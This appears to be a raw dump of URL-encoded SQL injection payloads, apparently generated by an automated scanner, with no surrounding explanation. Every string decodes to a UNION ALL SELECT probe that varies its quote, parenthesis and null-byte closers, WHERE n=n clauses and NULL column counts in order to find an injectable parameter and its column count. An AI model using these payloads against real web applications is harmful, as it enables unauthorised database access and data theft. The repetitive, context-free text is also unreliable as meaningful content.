1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%208142%3D8142%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%205908%3D5908%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%203306%3D3306%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%201098%3D1098%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%202373%3D2373%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%202193%3D2193%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 